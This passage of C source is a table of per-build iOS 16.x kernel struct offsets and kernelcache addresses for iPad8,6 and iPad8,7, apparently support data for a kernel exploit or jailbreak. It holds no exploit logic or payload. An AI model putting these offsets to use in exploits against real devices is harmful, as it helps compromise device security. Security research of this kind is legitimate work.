0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,6", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,7 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,7", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,7", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,7", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, 